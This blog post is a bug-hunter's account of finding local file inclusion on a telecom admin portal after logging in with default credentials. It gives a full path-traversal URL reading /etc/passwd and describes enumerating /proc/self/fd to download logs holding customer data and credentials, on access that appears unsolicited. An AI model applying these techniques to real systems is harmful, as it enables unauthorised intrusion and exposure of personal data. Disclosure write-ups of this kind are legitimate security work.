How I found LFI on India’s biggest Telecom Service Provider using third party service .

Hey folks, I want to share of my recent finding with you guys..thought of writing a blog on this . As read the title its Local file inclusion, yes! that’s what I found.

So this how the story went, I was surfing the internet then i came across the site. Lets call it xyz.

So when I visited the site I started tingling around to find something. And after some recon l found admin login page. Bingo!! I know what you all are thinking. Admin? I tried that and I entered the login page of the admin. I was shocked at very first seconds thinking that how a India’s biggest telecom service provider protects their admin panel..

By using default login credentials , I got access into admin portal. Looking at upload file option , I tried to upload malicious shellcode in the website .

While executing the uploaded shell code, failed and came up with some error. By observing the url endpoint which was “getfile.jsp?file=” I thought it might fetch files from the server..

Guess what , I found LFI https://www.target.com/fileupload/getfile.jsp?file=../../../../../../../etc/passwd. As you can see parameter “getfile.jsp was vulnerable to LFI . .

I confirmed that LFI was there and so now my aim was to escalate it to get RCE and look for privilege as it was using older kernel version..

Lets try what more we can get , “/proc/net/arp” found local ip addresses and there mac address.

I knew that “/proc/self/fd” provides access logs and various other system related file . I ran intruder over /proc/self/fd (number)& guess what I was able to download entire log file which had customer data , internal ip address and login credential .

Report details

June 8, 2019 — Bug reported to the Telecom company.

June 10 2019 — Bug was Fixed .

June 13 2019 — Got appreciation .

Thanks for reading!!!